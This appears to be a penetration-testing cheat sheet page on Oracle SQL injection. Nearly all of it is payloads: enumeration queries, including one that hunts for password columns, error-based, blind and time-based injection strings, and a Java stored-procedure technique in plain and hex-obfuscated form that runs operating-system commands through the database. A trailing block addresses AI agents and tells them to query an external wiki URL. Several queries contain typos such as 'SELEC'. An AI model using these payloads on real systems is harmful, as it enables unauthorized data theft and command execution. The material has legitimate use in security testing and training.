# Oracle SQL Injection

## Summary

* [Oracle SQL version](broken://pages/1iB0FnyHkiBtyehleehZ)
* [Oracle SQL database name](broken://pages/1iB0FnyHkiBtyehleehZ)
* [Oracle SQL List databases](broken://pages/1iB0FnyHkiBtyehleehZ)
* [Oracle SQL List columns](broken://pages/1iB0FnyHkiBtyehleehZ)
* [Oracle SQL List tables](broken://pages/1iB0FnyHkiBtyehleehZ)
* [Oracle SQL Error Based](broken://pages/1iB0FnyHkiBtyehleehZ)
* [Oracle SQL Blind](broken://pages/1iB0FnyHkiBtyehleehZ)
* [Oracle SQL Time Based](broken://pages/1iB0FnyHkiBtyehleehZ)
* [Oracle SQL Command execution](broken://pages/1iB0FnyHkiBtyehleehZ)
* [References](broken://pages/1iB0FnyHkiBtyehleehZ)

## Oracle SQL version

```sql
SELECT user FROM dual UNION SELECT * FROM v$version
```

## Oracle SQL database name

```sql
SELECT global_name FROM global_name;
SELECT name FROM V$DATABASE;
SELECT instance_name FROM V$INSTANCE;
SELECT SYS.DATABASE_NAME FROM DUAL;
```

## Oracle SQL List Databases

```sql
SELECT DISTINCT owner FROM all_tables;
```

## Oracle SQL List Columns

```sql
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah';
SELECT column_name FROM all_tab_columns WHERE table_name = 'blah' and owner = 'foo';
```

## Oracle SQL List Tables

```sql
SELECT table_name FROM all_tables;
SELECT owner, table_name FROM all_tables;
SELECT owner, table_name FROM all_tab_columns WHERE column_name LIKE '%PASS%';
```

## Oracle SQL Error based

| Description          | Query                                                                                                                                  |
| -------------------- | -------------------------------------------------------------------------------------------------------------------------------------- |
| Invalid HTTP Request | SELECT utl\_inaddr.get\_host\_name((select banner from v$version where rownum=1)) FROM dual                                            |
| CTXSYS.DRITHSX.SN    | SELECT CTXSYS.DRITHSX.SN(user,(select banner from v$version where rownum=1)) FROM dual                                                 |
| Invalid XPath        | SELECT ordsys.ord\_dicom.getmappingxpath((select banner from v$version where rownum=1),user,user) FROM dual                            |
| Invalid XML          | SELECT to\_char(dbms\_xmlgen.getxml('select "'\|\|(select user from sys.dual)\|\|'" FROM sys.dual')) FROM dual                         |
| Invalid XML          | SELECT rtrim(extract(xmlagg(xmlelement("s", username \|\| ',')),'/s').getstringval(),',') FROM all\_users                              |
| SQL Error            | SELECT NVL(CAST(LENGTH(USERNAME) AS VARCHAR(4000)),CHR(32)) FROM (SELECT USERNAME,ROWNUM AS LIMIT FROM SYS.ALL\_USERS) WHERE LIMIT=1)) |

## Oracle SQL Blind

| Description                               | Query                                                                                               |
| ----------------------------------------- | --------------------------------------------------------------------------------------------------- |
| Version is 12.2                           | SELECT COUNT(\*) FROM v$version WHERE banner LIKE 'Oracle%12.2%';                                   |
| Subselect is enabled                      | SELECT 1 FROM dual WHERE 1=(SELECT 1 FROM dual)                                                     |
| Table log\_table exists                   | SELECT 1 FROM dual WHERE 1=(SELECT 1 from log\_table);                                              |
| Column message exists in table log\_table | SELEC COUNT(\*) FROM user\_tab\_cols WHERE column\_name = 'MESSAGE' AND table\_name = 'LOG\_TABLE'; |
| First letter of first message is t        | SELEC message FROM log\_table WHERE rownum=1 AND message LIKE 't%';                                 |

## Oracle SQL Time based

```sql
AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])                 comment:   -- /**/
```

## Oracle SQL Command execution

* [ODAT (Oracle Database Attacking Tool)](https://github.com/quentinhardy/odat)

```sql
/* create Java class */
BEGIN
EXECUTE IMMEDIATE 'create or replace and compile java source named "PwnUtil" as import java.io.*; public class PwnUtil{ public static String runCmd(String args){ try{ BufferedReader myReader = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream()));String stemp, str = "";while ((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}} public static String readFile(String filename){ try{ BufferedReader myReader = new BufferedReader(new FileReader(filename));String stemp, str = "";while((stemp = myReader.readLine()) != null) str += stemp + "\n";myReader.close();return str;} catch (Exception e){ return e.toString();}}};';
END;
/

BEGIN
EXECUTE IMMEDIATE 'create or replace function PwnUtilFunc(p_cmd in varchar2) return varchar2 as language java name ''PwnUtil.runCmd(java.lang.String) return String'';';
END;
/

/* run OS command */
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
```

or (hex encoded)

```sql
/* create Java class */
SELECT TO_CHAR(dbms_xmlquery.getxml('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c61636520616e6420636f6d70696c65206a61766120736f75726365206e616d6564202270776e7574696c2220617320696d706f7274206a6176612e696f2e2a3b7075626c696320636c6173732070776e7574696c7b7075626c69632073746174696320537472696e672072756e28537472696e672061726773297b7472797b4275666665726564526561646572206d726561643d6e6577204275666665726564526561646572286e657720496e70757453747265616d5265616465722852756e74696d652e67657452756e74696d6528292e657865632861726773292e676574496e70757453747265616d282929293b20537472696e67207374656d702c207374723d22223b207768696c6528287374656d703d6d726561642e726561644c696e6528292920213d6e756c6c29207374722b3d7374656d702b225c6e223b206d726561642e636c6f736528293b2072657475726e207374723b7d636174636828457863657074696f6e2065297b72657475726e20652e746f537472696e6728293b7d7d7d''));
EXECUTE IMMEDIATE utl_raw.cast_to_varchar2(hextoraw(''637265617465206f72207265706c6163652066756e6374696f6e2050776e5574696c46756e6328705f636d6420696e207661726368617232292072657475726e207661726368617232206173206c616e6775616765206a617661206e616d65202770776e7574696c2e72756e286a6176612e6c616e672e537472696e67292072657475726e20537472696e67273b'')); end;')) results FROM dual

/* run OS command */
SELECT PwnUtilFunc('ping -c 4 localhost') FROM dual;
```

## References

* [NetSpi - SQL Wiki](https://sqlwiki.netspi.com/injectionTypes/errorBased/#oracle)
* [ASDC12 - New and Improved Hacking Oracle From Web](https://owasp.org/www-pdf-archive/ASDC12-New_and_Improved_Hacking_Oracle_From_Web.pdf)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.brinkles.wiki/tools/web-app-pentesting/payload-all-the-things/sql-injection/oracle-sql-injection.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.